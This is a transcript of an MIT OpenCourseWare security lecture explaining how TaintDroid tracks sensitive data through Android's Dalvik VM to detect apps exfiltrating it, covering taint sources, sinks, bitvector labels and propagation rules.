1 00:00:00,080 --> 00:00:02,430 The following content is provided under a Creative 2 00:00:02,430 --> 00:00:03,810 Commons license. 3 00:00:03,810 --> 00:00:06,050 Your support will help MIT OpenCourseWare 4 00:00:06,050 --> 00:00:10,150 continue to offer high quality educational resources for free. 5 00:00:10,150 --> 00:00:12,690 To make a donation or to view additional materials 6 00:00:12,690 --> 00:00:16,600 from hundreds of MIT courses, visit MIT OpenCourseWare 7 00:00:16,600 --> 00:00:17,310 at ocw.mit.edu. 8 00:00:25,732 --> 00:00:28,210 PROFESSOR: All right, let's get started. 9 00:00:28,210 --> 00:00:29,820 Thank you for showing up to this very 10 00:00:29,820 --> 00:00:32,619 special pre-Thanksgiving lecture. 11 00:00:32,619 --> 00:00:35,570 I'm glad you guys have such devotion to security, 12 00:00:35,570 --> 00:00:37,790 I'm sure that you will be rewarded on the job market 13 00:00:37,790 --> 00:00:38,373 at some point. 14 00:00:38,373 --> 00:00:40,340 Feel free to list me as a recommendation. 15 00:00:40,340 --> 00:00:42,877 So today we're going to talk about taint tracking, 16 00:00:42,877 --> 00:00:45,210 and in particular we're going to look at a system called 17 00:00:45,210 --> 00:00:47,950 TaintDroid that looks at how to do this type of information 18 00:00:47,950 --> 00:00:51,930 flow analysis in the context of Android smartphones. 19 00:00:51,930 --> 00:00:54,970 And so the basic problem the paper deals with 20 00:00:54,970 --> 00:00:57,190 is this fact that apps can exfiltrate data. 21 00:00:57,190 --> 00:00:58,940 So the basic idea is that your phone 22 00:00:58,940 --> 00:01:01,670 contains a lot of sensitive information, right. 23 00:01:01,670 --> 00:01:05,060 It contains your contacts list and your phone number 24 00:01:05,060 --> 00:01:06,920 and your email and all that kind of stuff. 25 00:01:06,920 --> 00:01:12,070 So if the operating system or the phone itself isn't careful, 26 00:01:12,070 --> 00:01:14,550 then a malicious app might be able to take 27 00:01:14,550 --> 00:01:17,030 some of that information and send it back 28 00:01:17,030 --> 00:01:19,337 to its home server, and that server 29 00:01:19,337 --> 00:01:21,170 can use it for all types of nefarious things 30 00:01:21,170 --> 00:01:23,810 as we'll talk about later. 31 00:01:23,810 --> 00:01:29,900 The high-level solution that the TaintDroid paper suggests 32 00:01:29,900 --> 00:01:35,320 is that we should basically track the sensitive data as it 33 00:01:35,320 --> 00:01:37,940 flows through the system, and essentially, we 34 00:01:37,940 --> 00:01:42,754 need to stop it from going over the network. 35 00:01:42,754 --> 00:01:44,170 In other words, we need to stop it 36 00:01:44,170 --> 00:01:50,380 from being passed as an argument to networking system calls. 37 00:01:54,260 --> 00:01:56,400 And so presumably, if we can do that, 38 00:01:56,400 --> 00:01:59,230 then we can essentially stop the leak right at the moment 39 00:01:59,230 --> 00:02:00,940 that it's about to happen. 40 00:02:00,940 --> 00:02:02,660 So you might think to yourself, so why 41 00:02:02,660 --> 00:02:05,470 are traditional Android permissions 42 00:02:05,470 --> 00:02:09,770 insufficient to stop these types of data exfiltrations? 43 00:02:09,770 --> 00:02:12,660 And the reason is that these permissions don't really 44 00:02:12,660 --> 00:02:15,452 have the appropriate grammar to talk about the type of attack 45 00:02:15,452 --> 00:02:16,660 that we're trying to prevent. 46 00:02:16,660 --> 00:02:18,493 So a lot of times these Android permissions, 47 00:02:18,493 --> 00:02:21,400 they deal with these things like can an application 48 00:02:21,400 --> 00:02:23,550 read or write to a particular device. 49 00:02:23,550 --> 00:02:24,940 But we're talking about something 50 00:02:24,940 --> 00:02:27,570 at a sort of different level of semantics. 51 00:02:27,570 --> 00:02:30,620 We're saying even if an application has been granted 52 00:02:30,620 --> 00:02:33,330 the authority to read or write a particular device, 53 00:02:33,330 --> 00:02:35,830 like the network, for example, it still 54 00:02:35,830 --> 00:02:40,100 might not be good to allow that application to read or write 55 00:02:40,100 --> 00:02:43,000 certain sensitive data over that device to which it 56 00:02:43,000 --> 00:02:44,890 has permissions. 57 00:02:44,890 --> 00:02:48,060 In other words, using these traditional Android security 58 00:02:48,060 --> 00:02:49,690 policies, it is difficult to speak 59 00:02:49,690 --> 00:02:51,997 about specific types of data. 60 00:02:51,997 --> 00:02:54,580 It's much easier to talk about whether an application accesses 61 00:02:54,580 --> 00:02:55,620 a device or not. 62 00:02:55,620 --> 00:03:00,490 So you might think, all right, so that's kind of a bummer, 63 00:03:00,490 --> 00:03:02,870 but maybe we can solve this problem 64 00:03:02,870 --> 00:03:07,015 by-- we have this alternate solution, so we'll 65 00:03:07,015 --> 00:03:08,600 call this solution star. 66 00:03:08,600 --> 00:03:11,410 So maybe we can just never install 67 00:03:11,410 --> 00:03:21,410 applications that can do reads of sensitive data 68 00:03:21,410 --> 00:03:24,690 and also have network access. 69 00:03:27,660 --> 00:03:29,890 At first glance, that seems to solve the problem. 70 00:03:29,890 --> 00:03:31,430 Because if it can't do both of these things, 71 00:03:31,430 --> 00:03:33,138 it either can't get to the sensitive data 72 00:03:33,138 --> 00:03:35,879 in the first place, or it can, but it can't send it anywhere. 73 00:03:35,879 --> 00:03:38,170 So does anyone have any ideas where this probably isn't 74 00:03:38,170 --> 00:03:39,336 going to work out very well? 75 00:03:42,252 --> 00:03:43,960 Everyone's already thinking about turkey. 76 00:03:43,960 --> 00:03:46,760 I can see in your eyes. 77 00:03:46,760 --> 00:03:50,500 The main reason why this is probably a bad idea 78 00:03:50,500 --> 00:03:57,220 is that this is going to break a lot of legitimate applications. 79 00:03:59,950 --> 00:04:02,234 So you could imagine that there are a lot of programs, 80 00:04:02,234 --> 00:04:03,650 like maybe email clients or things 81 00:04:03,650 --> 00:04:07,550 like that, that should actually have the ability, perhaps, 82 00:04:07,550 --> 00:04:09,060 to read some data that's sensitive 83 00:04:09,060 --> 00:04:12,044 and also send information over the network. 84 00:04:12,044 --> 00:04:13,460 So if we just say that we're going 85 00:04:13,460 --> 00:04:15,617 to prevent this sort of and type of activity, 86 00:04:15,617 --> 00:04:17,700 then you're actually going to make a lot of things 87 00:04:17,700 --> 00:04:20,019 that work right now fail. 88 00:04:20,019 --> 00:04:22,220 So users are not going to like that. 89 00:04:22,220 --> 00:04:26,580 There's also a problem here is that even if we did implement 90 00:04:26,580 --> 00:04:32,300 this solution, it's not going to stop a bunch of different side 91 00:04:32,300 --> 00:04:35,890 channel mechanisms for data leakage. 92 00:04:35,890 --> 00:04:37,930 So for example, we've looked in previous classes 93 00:04:37,930 --> 00:04:40,750 about how the browser cache, for example, 94 00:04:40,750 --> 00:04:43,900 can leak information about whether a particular site has 95 00:04:43,900 --> 00:04:45,200 been visited or not. 96 00:04:45,200 --> 00:04:48,200 And so even if we have a security policy like this, 97 00:04:48,200 --> 00:04:50,387 maybe we don't capture all kinds of side channels. 98 00:04:50,387 --> 00:04:52,720 We'll talk about some other side channels a little later 99 00:04:52,720 --> 00:04:54,870 in the lecture. 100 00:04:54,870 --> 00:05:01,250 Another thing that this wouldn't stop is app collusion. 101 00:05:01,250 --> 00:05:05,040 So two apps can actually collaborate 102 00:05:05,040 --> 00:05:07,220 to break the security system. 103 00:05:07,220 --> 00:05:10,400 So for example, what if there's one app that 104 00:05:10,400 --> 00:05:12,060 doesn't have access network, but it 105 00:05:12,060 --> 00:05:14,600 can talk to a second application, which does. 106 00:05:14,600 --> 00:05:16,879 So maybe it can use Android's IPC mechanisms 107 00:05:16,879 --> 00:05:18,920 to pass the sensitive data to an application that 108 00:05:18,920 --> 00:05:21,170 does have network permissions, and that second app can 109 00:05:21,170 --> 00:05:24,780 actually upload that information to the server. 110 00:05:24,780 --> 00:05:27,920 And even if the apps aren't colluding, 111 00:05:27,920 --> 00:05:31,540 then there may be some type of trickery 112 00:05:31,540 --> 00:05:34,300 that an application can engage in 113 00:05:34,300 --> 00:05:37,000 to trick some other applications into accidentally revealing 114 00:05:37,000 --> 00:05:38,040 sensitive data. 115 00:05:38,040 --> 00:05:40,960 So maybe there's some type of weakness in the way 116 00:05:40,960 --> 00:05:42,510 that the email program is written, 117 00:05:42,510 --> 00:05:45,322 and so perhaps that email program accepts 118 00:05:45,322 --> 00:05:47,280 too many random messages from other things that 119 00:05:47,280 --> 00:05:48,340 are living on the system. 120 00:05:48,340 --> 00:05:50,850 So perhaps we could craft a special intent that's somehow 121 00:05:50,850 --> 00:05:53,360 going to trick your Gmail application, for example, 122 00:05:53,360 --> 00:05:57,409 into emailing something to someone outside of the phone. 123 00:05:57,409 --> 00:05:59,950 At a high level, this approach doesn't really work very well. 124 00:06:02,682 --> 00:06:04,390 One important thing to think about is OK, 125 00:06:04,390 --> 00:06:06,681 so it seems like we're very worried about the sensitive 126 00:06:06,681 --> 00:06:07,710 data leaving the phone. 127 00:06:07,710 --> 00:06:12,690 So what does Android malware actually do in practice. 128 00:06:12,690 --> 00:06:16,364 Are there any kinds of real world attacks 129 00:06:16,364 --> 00:06:18,030 that we're going to be preventing by all 130 00:06:18,030 --> 00:06:19,950 this taint tracking type stuff. 131 00:06:19,950 --> 00:06:21,320 And the answer is yes. 132 00:06:21,320 --> 00:06:24,080 So increasingly, malware is becoming a bigger problem 133 00:06:24,080 --> 00:06:25,080 for these mobile phones. 134 00:06:25,080 --> 00:06:31,020 So one thing it might do is it might use your location 135 00:06:31,020 --> 00:06:37,325 or maybe your IMEI for ads. 136 00:06:40,227 --> 00:06:41,810 So similarly to malware, it's actually 137 00:06:41,810 --> 00:06:44,060 going to look and see where you are physically located 138 00:06:44,060 --> 00:06:46,970 in the world and then maybe it will that oh, you're 139 00:06:46,970 --> 00:06:48,720 located near the MIT campus, therefore you 140 00:06:48,720 --> 00:06:50,190 must be a hungry student so hey, why don't you 141 00:06:50,190 --> 00:06:52,356 go to my food truck that happens to be located right 142 00:06:52,356 --> 00:06:54,130 where you are. 143 00:06:54,130 --> 00:06:57,282 IMEI is kind of like this-- you can 144 00:06:57,282 --> 00:07:00,410 think of it as an integer that's like a per device uniquefier. 145 00:07:00,410 --> 00:07:02,924 So this could be used perhaps to track you in ways that you 146 00:07:02,924 --> 00:07:04,965 don't want to be tracked, in different locations, 147 00:07:04,965 --> 00:07:05,757 so on and so forth. 148 00:07:05,757 --> 00:07:07,381 So there's actually malware in the wild 149 00:07:07,381 --> 00:07:08,840 that does things like that. 150 00:07:08,840 --> 00:07:11,080 Another thing that malware might try to do 151 00:07:11,080 --> 00:07:13,040 is steal your credentials. 152 00:07:17,250 --> 00:07:22,850 So for example, it might try to take your phone number, 153 00:07:22,850 --> 00:07:24,880 or it might try to take your contact list, 154 00:07:24,880 --> 00:07:27,680 it might try to upload those things to a remote server. 155 00:07:27,680 --> 00:07:30,690 Maybe that's useful for trying to impersonate you, 156 00:07:30,690 --> 00:07:33,690 for example, in a message that's going 157 00:07:33,690 --> 00:07:35,790 to be used for spam later on. 158 00:07:35,790 --> 00:07:39,990 There's malware out there that does things like this today. 159 00:07:39,990 --> 00:07:44,290 Perhaps most horrifyingly, at least for me, 160 00:07:44,290 --> 00:07:49,891 malware might be able to turn your phone into a bot. 161 00:07:49,891 --> 00:07:52,140 This, of course, is a problem that our parents did not 162 00:07:52,140 --> 00:07:53,120 have to deal with. 163 00:07:53,120 --> 00:07:55,380 Modern phones are so powerful that they can actually 164 00:07:55,380 --> 00:07:57,845 be used to send out spam messages themselves. 165 00:07:57,845 --> 00:08:00,230 So there's actually a pretty nasty piece 166 00:08:00,230 --> 00:08:01,900 of malware that's going around right now 167 00:08:01,900 --> 00:08:03,810 that seems to be targeting some corporate environments that's 168 00:08:03,810 --> 00:08:04,710 doing precisely this. 169 00:08:04,710 --> 00:08:07,168 So it gets to your phone and just starts sending out stuff. 170 00:08:07,168 --> 00:08:09,160 AUDIENCE: So this type of malware, 171 00:08:09,160 --> 00:08:12,397 is it malware that subverts the Android OS, or is it 172 00:08:12,397 --> 00:08:13,642 just a typical app? 173 00:08:13,642 --> 00:08:16,630 If it's a typical app, it seems that it should be able-- 174 00:08:16,630 --> 00:08:18,810 PROFESSOR: Yeah. 175 00:08:18,810 --> 00:08:20,720 That's a good question. 176 00:08:20,720 --> 00:08:22,720 There's both types of malware out there. 177 00:08:22,720 --> 00:08:24,990 As it turns out, it's actually fairly easy 178 00:08:24,990 --> 00:08:28,620 to get users to click on things. 179 00:08:28,620 --> 00:08:29,790 So I'll give you an example. 180 00:08:29,790 --> 00:08:31,290 This isn't necessarily indicative of malware, 181 00:08:31,290 --> 00:08:32,832 more about the sad state of humanity. 182 00:08:32,832 --> 00:08:34,373 There'll be a popular game out there, 183 00:08:34,373 --> 00:08:35,832 let's say Angry Birds, for example. 184 00:08:35,832 --> 00:08:37,997 You go to the App Store and you type in Angry Birds, 185 00:08:37,997 --> 00:08:39,110 I want to get Angry Birds. 186 00:08:39,110 --> 00:08:40,880 So hopefully the first hit that you get 187 00:08:40,880 --> 00:08:42,530 is the actual Angry Birds. 188 00:08:42,530 --> 00:08:46,160 But then the second hit will be something like Angry Birdss, 189 00:08:46,160 --> 00:08:47,374 with two S's, for example. 190 00:08:47,374 --> 00:08:48,790 And a lot of people will go there, 191 00:08:48,790 --> 00:08:50,789 and maybe it's cheaper than the regular version, 192 00:08:50,789 --> 00:08:51,649 and they go there. 193 00:08:51,649 --> 00:08:53,440 It's going to present that thing that says, 194 00:08:53,440 --> 00:08:55,450 do you allow this application to do this, this, and this. 195 00:08:55,450 --> 00:08:57,275 The person is going say, yeah, because I got to get my Angry 196 00:08:57,275 --> 00:08:58,190 Birds, yeah, sure. 197 00:08:58,190 --> 00:09:00,280 Boom, then that person could be owned. 198 00:09:00,280 --> 00:09:01,910 So in practice you see now where it 199 00:09:01,910 --> 00:09:03,520 exploits both types of vectors. 200 00:09:03,520 --> 00:09:06,800 But you're exactly right that if you assume that the Android 201 00:09:06,800 --> 00:09:09,950 security model is correct, then the malware sort 202 00:09:09,950 --> 00:09:13,760 has to depend on users being foolish or naive 203 00:09:13,760 --> 00:09:15,869 and giving it network access, for example, 204 00:09:15,869 --> 00:09:17,660 when your tic-tac-toe game shouldn't really 205 00:09:17,660 --> 00:09:18,530 have network access. 206 00:09:21,814 --> 00:09:23,480 Yes, so you can actually have your phone 207 00:09:23,480 --> 00:09:24,470 get turned into a bot. 208 00:09:24,470 --> 00:09:25,860 This is horrible for multiple reasons, 209 00:09:25,860 --> 00:09:27,360 not only because your phone is a bot 210 00:09:27,360 --> 00:09:28,930 but also because maybe you're paying 211 00:09:28,930 --> 00:09:30,612 for data for all those emails that are 212 00:09:30,612 --> 00:09:31,820 getting sent from your phone. 213 00:09:31,820 --> 00:09:33,640 Maybe your battery's getting ground down 214 00:09:33,640 --> 00:09:36,610 because you phone's just sitting around constantly 215 00:09:36,610 --> 00:09:41,740 sending ads about whenever, free trips to Bermuda or whatever. 216 00:09:41,740 --> 00:09:45,170 There are actually malicious applications out there 217 00:09:45,170 --> 00:09:48,975 that will use your private information for bad. 218 00:09:48,975 --> 00:09:50,850 And the particularly bad thing about this bot 219 00:09:50,850 --> 00:09:52,891 here is that it can actually look at your contact 220 00:09:52,891 --> 00:09:54,380 list and some spam on your behalf 221 00:09:54,380 --> 00:09:57,130 to people that you know and make the likelihood of the victim 222 00:09:57,130 --> 00:09:59,380 clicking on something in that email much, much higher. 223 00:10:01,511 --> 00:10:03,510 One thing to note, and this kind of getting back 224 00:10:03,510 --> 00:10:04,660 to the discussion we just had, so 225 00:10:04,660 --> 00:10:06,034 preventing this data exfiltration 226 00:10:06,034 --> 00:10:07,240 is very nice, right. 227 00:10:07,240 --> 00:10:09,440 But in and of itself, preventing that exfiltration 228 00:10:09,440 --> 00:10:11,512 doesn't stop the hack in the first place. 229 00:10:11,512 --> 00:10:13,470 So there's actually mechanisms that we actually 230 00:10:13,470 --> 00:10:15,910 should look at to prevent your machine from getting owned 231 00:10:15,910 --> 00:10:18,249 in the first place or to educate users about what they 232 00:10:18,249 --> 00:10:19,540 should and should not click on. 233 00:10:19,540 --> 00:10:20,914 So just doing this taint tracking 234 00:10:20,914 --> 00:10:23,124 isn't a full solution for preventing your machine 235 00:10:23,124 --> 00:10:24,165 from getting compromised. 236 00:10:26,910 --> 00:10:33,240 How is TaintDroid in particular going to work? 237 00:10:33,240 --> 00:10:35,520 Let's see. 238 00:10:35,520 --> 00:10:38,460 So as I mentioned before, TaintDroid 239 00:10:38,460 --> 00:10:43,760 is going to track all of your sensitive information 240 00:10:43,760 --> 00:10:45,520 as it propagates through the system. 241 00:10:45,520 --> 00:10:48,340 So TaintDroid distinguishes between what 242 00:10:48,340 --> 00:10:51,140 they call information sources and information sinks. 243 00:10:51,140 --> 00:10:58,240 So these sources are things that generate sensitive data. 244 00:10:58,240 --> 00:11:02,520 So you might think of this as things like sensors. 245 00:11:02,520 --> 00:11:05,310 So for example, GPS, accelerometer, 246 00:11:05,310 --> 00:11:06,780 things like that. 247 00:11:06,780 --> 00:11:12,600 This could be your contact list database, 248 00:11:12,600 --> 00:11:20,520 this could be things like the IMEI, basically anything that 249 00:11:20,520 --> 00:11:24,000 might help to tie you, a particular user, 250 00:11:24,000 --> 00:11:25,250 to your actual phone. 251 00:11:25,250 --> 00:11:28,220 So these are the things that generate the taint. 252 00:11:28,220 --> 00:11:31,280 And then you can think of these sinks 253 00:11:31,280 --> 00:11:36,170 as being the places where we don't want tainted data to go. 254 00:11:36,170 --> 00:11:38,150 And so in the case of TaintDroid, 255 00:11:38,150 --> 00:11:41,530 the particular sink that we're concerned about is the network. 256 00:11:44,090 --> 00:11:47,690 As we'll talk about later, you can generalize information flow 257 00:11:47,690 --> 00:11:49,990 to more scenarios than TaintDroid specifically covers. 258 00:11:49,990 --> 00:11:52,281 So you can imagine there might be other sinks in a more 259 00:11:52,281 --> 00:11:53,430 general purpose system. 260 00:11:53,430 --> 00:11:54,971 But for TaintDroid, they're literally 261 00:11:54,971 --> 00:11:59,180 caring about the network as the sink for information. 262 00:11:59,180 --> 00:12:08,550 So in TaintDroid, they're going to use a 32-bit bitvector 263 00:12:08,550 --> 00:12:12,300 to represent taint. 264 00:12:12,300 --> 00:12:15,590 And so what this basically means is that you can have, 265 00:12:15,590 --> 00:12:20,140 at most, 32 distinct taint sources. 266 00:12:20,140 --> 00:12:22,510 So each sensitive data value will 267 00:12:22,510 --> 00:12:24,204 have a one in a particular position 268 00:12:24,204 --> 00:12:26,620 if it has been tainted by some particular source of taint. 269 00:12:26,620 --> 00:12:31,370 That's like, has it been derived from your GPS data, 270 00:12:31,370 --> 00:12:32,140 for example. 271 00:12:32,140 --> 00:12:34,370 Has it been derived from something from your contacts 272 00:12:34,370 --> 00:12:37,540 list, and so on and so forth. 273 00:12:37,540 --> 00:12:41,680 One interesting thing is that 32 sources of taint 274 00:12:41,680 --> 00:12:44,120 is actually not that big, right. 275 00:12:44,120 --> 00:12:47,960 And so an interesting question is, 276 00:12:47,960 --> 00:12:49,900 is that big enough for this particular system 277 00:12:49,900 --> 00:12:52,108 and is it big enough in general for these information 278 00:12:52,108 --> 00:12:53,430 flow systems. 279 00:12:53,430 --> 00:12:55,860 So in a particular case of TaintDroid, 280 00:12:55,860 --> 00:12:58,160 32 possible sources of taint seems 281 00:12:58,160 --> 00:13:01,160 to be somewhat reasonable, because it's actually 282 00:13:01,160 --> 00:13:04,360 looking at a fairly constrained information flow problem. 283 00:13:04,360 --> 00:13:07,230 So it's saying given all the sensors you have on your phone, 284 00:13:07,230 --> 00:13:09,400 given all of these sensitive databases, 285 00:13:09,400 --> 00:13:12,000 and things like that, 32 seems roughly 286 00:13:12,000 --> 00:13:15,250 the right order of magnitude in terms 287 00:13:15,250 --> 00:13:18,170 of storing these taint flags. 288 00:13:18,170 --> 00:13:21,100 And as we'll see in the implementation of this system, 289 00:13:21,100 --> 00:13:22,600 32 is actually very convenient, too, 290 00:13:22,600 --> 00:13:24,390 because what else is 32 bits? 291 00:13:24,390 --> 00:13:25,590 Well, an integer. 292 00:13:25,590 --> 00:13:28,006 So you can actually do some very efficient representations 293 00:13:28,006 --> 00:13:30,650 of these taint flags in the way that they actually build this. 294 00:13:30,650 --> 00:13:32,150 As we'll discuss a little bit later, 295 00:13:32,150 --> 00:13:36,090 though, if you want to expose information flow to programmers 296 00:13:36,090 --> 00:13:38,310 in a more generic way, so for example, 297 00:13:38,310 --> 00:13:40,440 if you want programmers be able to specify 298 00:13:40,440 --> 00:13:44,080 their own sources of taint and their own types of sink, 299 00:13:44,080 --> 00:13:46,660 then 32 bits probably isn't enough. 300 00:13:46,660 --> 00:13:48,060 In systems like that you actually 301 00:13:48,060 --> 00:13:51,790 have to think about including more complex runtime support 302 00:13:51,790 --> 00:13:54,960 for a larger label space. 303 00:13:54,960 --> 00:13:57,720 So does that all make sense? 304 00:13:57,720 --> 00:14:02,830 OK so roughly speaking, when you look at the way 305 00:14:02,830 --> 00:14:06,370 that a taint flows through the system, at a high level, 306 00:14:06,370 --> 00:14:09,750 it basically goes from the right hand side of a statement 307 00:14:09,750 --> 00:14:11,160 to the left hand side. 308 00:14:11,160 --> 00:14:16,060 So as a very simple example, if you had some statement, 309 00:14:16,060 --> 00:14:19,180 like you declare an integer variable that's going to get 310 00:14:19,180 --> 00:14:27,520 your latitude, and then a high level you call gps.getLat(), 311 00:14:27,520 --> 00:14:31,770 then essentially this thing here is going to generate a value 312 00:14:31,770 --> 00:14:33,972 that has some taint that's associated with it. 313 00:14:33,972 --> 00:14:35,930 Some particular flag will be set that indicates 314 00:14:35,930 --> 00:14:38,400 that hey, this value I'm returning 315 00:14:38,400 --> 00:14:39,650 comes from a sensitive source. 316 00:14:39,650 --> 00:14:41,941 So the taint will come from here on the right hand side 317 00:14:41,941 --> 00:14:43,600 and go over here to the left hand side, 318 00:14:43,600 --> 00:14:45,840 and now that is actually tainted. 319 00:14:45,840 --> 00:14:49,210 So that's sort of what it looks like from the perspective 320 00:14:49,210 --> 00:14:52,080 of the human developer who writes source code. 321 00:14:52,080 --> 00:14:56,284 However, the Dalvik VM actually uses this register-based format 322 00:14:56,284 --> 00:14:58,200 at the lower level to actually build programs, 323 00:14:58,200 --> 00:15:00,770 and that's actually the way that these taint semantics 324 00:15:00,770 --> 00:15:03,864 are implemented in reality. 325 00:15:03,864 --> 00:15:06,030 This is what's explained in table one of the papers, 326 00:15:06,030 --> 00:15:09,345 so they have this big list of classes of opcodes, 327 00:15:09,345 --> 00:15:11,720 and they describe how taint sort of flows 328 00:15:11,720 --> 00:15:12,880 for those types of opcodes. 329 00:15:12,880 --> 00:15:14,950 So for example, you might imagine 330 00:15:14,950 --> 00:15:20,060 that you have an operation that looks kind of like a move, 331 00:15:20,060 --> 00:15:24,990 and so it mentions a destination and a source. 332 00:15:24,990 --> 00:15:28,334 So in Dalvik, to register a base virtual machines, 333 00:15:28,334 --> 00:15:29,750 so you can think of these as being 334 00:15:29,750 --> 00:15:33,450 registers on this sort of abstract computation engine. 335 00:15:33,450 --> 00:15:36,990 And so essentially what happens here is that, like I said, 336 00:15:36,990 --> 00:15:39,557 taint goes from the right hand side to the left hand side. 337 00:15:39,557 --> 00:15:41,390 So in this case, when the Dalvik interpreter 338 00:15:41,390 --> 00:15:43,190 executes this instruction here, it's 339 00:15:43,190 --> 00:15:45,830 going to look at the taint label, this, 340 00:15:45,830 --> 00:15:48,050 and it's going to assign it over here. 341 00:15:50,714 --> 00:15:53,130 Then you might imagine you have another instruction that's 342 00:15:53,130 --> 00:15:55,110 like a binary operation. 343 00:15:55,110 --> 00:15:59,300 So think of this as something like addition, for example. 344 00:15:59,300 --> 00:16:01,480 So here you'll have a single destination, 345 00:16:01,480 --> 00:16:07,350 but then you'll have two sources. 346 00:16:07,350 --> 00:16:09,000 And what will happen in this case 347 00:16:09,000 --> 00:16:12,120 is that when Dalvik interpreter encounters this instruction, 348 00:16:12,120 --> 00:16:14,040 it'll take the taints of both of these, 349 00:16:14,040 --> 00:16:18,960 construct a union of those, and then assign that union 350 00:16:18,960 --> 00:16:22,049 to be the taint tag over here. 351 00:16:22,049 --> 00:16:23,090 Does that all make sense? 352 00:16:23,090 --> 00:16:24,470 It's fairly straightforward. 353 00:16:24,470 --> 00:16:28,250 So the table breaks down all the different types of instructions 354 00:16:28,250 --> 00:16:30,952 that you'll see, but to a first approximation, 355 00:16:30,952 --> 00:16:32,660 these are the most common ways that taint 356 00:16:32,660 --> 00:16:34,500 propagates through the system. 357 00:16:34,500 --> 00:16:37,350 Now there are actually some interesting special cases 358 00:16:37,350 --> 00:16:39,240 that they mention in the paper. 359 00:16:39,240 --> 00:16:46,680 So one of those special cases involves arrays. 360 00:16:46,680 --> 00:16:49,130 Let's say that you have some code that's 361 00:16:49,130 --> 00:16:53,470 going to declare a character, and you 362 00:16:53,470 --> 00:16:56,480 get the value for the character somehow, doesn't really matter. 363 00:16:56,480 --> 00:17:02,380 And then let's say the program declares some array, 364 00:17:02,380 --> 00:17:04,609 we'll call it upper(). 365 00:17:04,609 --> 00:17:15,020 And it's basically going to have uppercase versions of letters. 366 00:17:15,020 --> 00:17:16,980 And so one very common thing to do in code 367 00:17:16,980 --> 00:17:20,690 is to index into an array like this using, for example, maybe 368 00:17:20,690 --> 00:17:22,580 just C directly, because as we all know, 369 00:17:22,580 --> 00:17:25,079 Kernighan and Ritchie teach us that basically characters are 370 00:17:25,079 --> 00:17:26,710 integers, so hooray for that. 371 00:17:26,710 --> 00:17:29,670 So you can imagine that you have some code that 372 00:17:29,670 --> 00:17:33,960 says something like the upper case version of this character 373 00:17:33,960 --> 00:17:38,080 here is going to be whatever is at a particular index 374 00:17:38,080 --> 00:17:43,400 in this table here, in the index that table by c like this. 375 00:17:43,400 --> 00:17:48,780 So there's a question of what taint should this receive. 376 00:17:48,780 --> 00:17:50,280 It seems pretty straightforward what 377 00:17:50,280 --> 00:17:52,930 should happen in these cases, but in this case, 378 00:17:52,930 --> 00:17:55,352 it seems like we have multiple things that are going on. 379 00:17:55,352 --> 00:17:57,810 We've got this array here that may have some type of taint, 380 00:17:57,810 --> 00:17:59,476 we've got this character c here that may 381 00:17:59,476 --> 00:18:01,500 have some type of taint. 382 00:18:01,500 --> 00:18:04,350 What Dalvik decides to do in this case 383 00:18:04,350 --> 00:18:05,835 is a little bit similar to what it 384 00:18:05,835 --> 00:18:08,000 does in the case of this binary op here. 385 00:18:08,000 --> 00:18:11,450 So it's essentially going to say that this character over here 386 00:18:11,450 --> 00:18:15,500 is going to get the union of the taint of c and also 387 00:18:15,500 --> 00:18:16,800 of the array. 388 00:18:16,800 --> 00:18:19,930 And the intuition behind that is that to generate 389 00:18:19,930 --> 00:18:23,000 this character, we somehow had to know something 390 00:18:23,000 --> 00:18:24,320 about this array here. 391 00:18:24,320 --> 00:18:26,702 We had to know something about this index here. 392 00:18:26,702 --> 00:18:28,160 So therefore I guess it makes sense 393 00:18:28,160 --> 00:18:30,789 that this thing should be as sensitive as both 394 00:18:30,789 --> 00:18:31,830 of these things combined. 395 00:18:35,580 --> 00:18:38,220 AUDIENCE: Can you explain again move op and binary 396 00:18:38,220 --> 00:18:40,860 op, what exactly it means, like the union of a taint. 397 00:18:40,860 --> 00:18:48,320 PROFESSOR: Yes, so imagine that-- let's look 398 00:18:48,320 --> 00:18:49,800 at the move op here. 399 00:18:49,800 --> 00:18:53,030 So imagine that this source operation here just 400 00:18:53,030 --> 00:18:56,050 had-- actually, let me get more concrete. 401 00:18:56,050 --> 00:18:57,760 So each variable, as I'll described 402 00:18:57,760 --> 00:19:00,610 in a second what a variable is, has this integer, essentially, 403 00:19:00,610 --> 00:19:02,460 that has a bunch of bits that are set 404 00:19:02,460 --> 00:19:04,550 according to what taint it has. 405 00:19:04,550 --> 00:19:06,760 So imagine each one of these values flying around 406 00:19:06,760 --> 00:19:08,270 has this associated integer flying 407 00:19:08,270 --> 00:19:09,740 around that has some bits set. 408 00:19:09,740 --> 00:19:14,415 So let's say that this source had two bits set, corresponding 409 00:19:14,415 --> 00:19:16,540 to the fact that it had been tainted by two things, 410 00:19:16,540 --> 00:19:17,510 it doesn't really matter. 411 00:19:17,510 --> 00:19:20,093 So what the interpreter will do is it will look at this source 412 00:19:20,093 --> 00:19:22,560 thing, it'll look at the associated integer, 413 00:19:22,560 --> 00:19:24,550 and it'll say aha. 414 00:19:24,550 --> 00:19:27,410 I should take that integer has those two bits set 415 00:19:27,410 --> 00:19:33,775 and then essentially make that integer the taint tag for this. 416 00:19:33,775 --> 00:19:35,400 So that's sort of a simple case, right. 417 00:19:35,400 --> 00:19:37,160 The more complicated case, like what does the union 418 00:19:37,160 --> 00:19:38,060 actually look like. 419 00:19:38,060 --> 00:19:44,480 So imagine that we've got these two things here 420 00:19:44,480 --> 00:19:48,524 and we've got source 0, source 1. 421 00:19:48,524 --> 00:19:49,940 And so I'm going to show you here, 422 00:19:49,940 --> 00:19:53,719 these are the tainted bits for this particular-- 423 00:19:53,719 --> 00:19:54,635 AUDIENCE: [INAUDIBLE]? 424 00:19:54,635 --> 00:19:58,819 PROFESSOR: Yeah, so imagine that you have 425 00:19:58,819 --> 00:20:00,110 this is the taint for this one. 426 00:20:00,110 --> 00:20:03,650 And imagine that the taint for this one is this. 427 00:20:03,650 --> 00:20:07,030 So what's the taint going to look like for dest? 428 00:20:07,030 --> 00:20:10,320 You basically take all of the bits that 429 00:20:10,320 --> 00:20:12,970 are saying either one of those and then assign that 430 00:20:12,970 --> 00:20:15,444 to that throwback to this one. 431 00:20:15,444 --> 00:20:16,610 AUDIENCE: All right, thanks. 432 00:20:16,610 --> 00:20:17,776 PROFESSOR: Yeah, no problem. 433 00:20:17,776 --> 00:20:20,940 And so one reasons, so once again I should emphasize this, 434 00:20:20,940 --> 00:20:24,390 so since we can represent all the possible taints in this 32 435 00:20:24,390 --> 00:20:26,590 bits, as we were just discussing, 436 00:20:26,590 --> 00:20:28,999 doing this operation here, it's just bitwise operations. 437 00:20:28,999 --> 00:20:31,040 So this actually really cuts down on the overhead 438 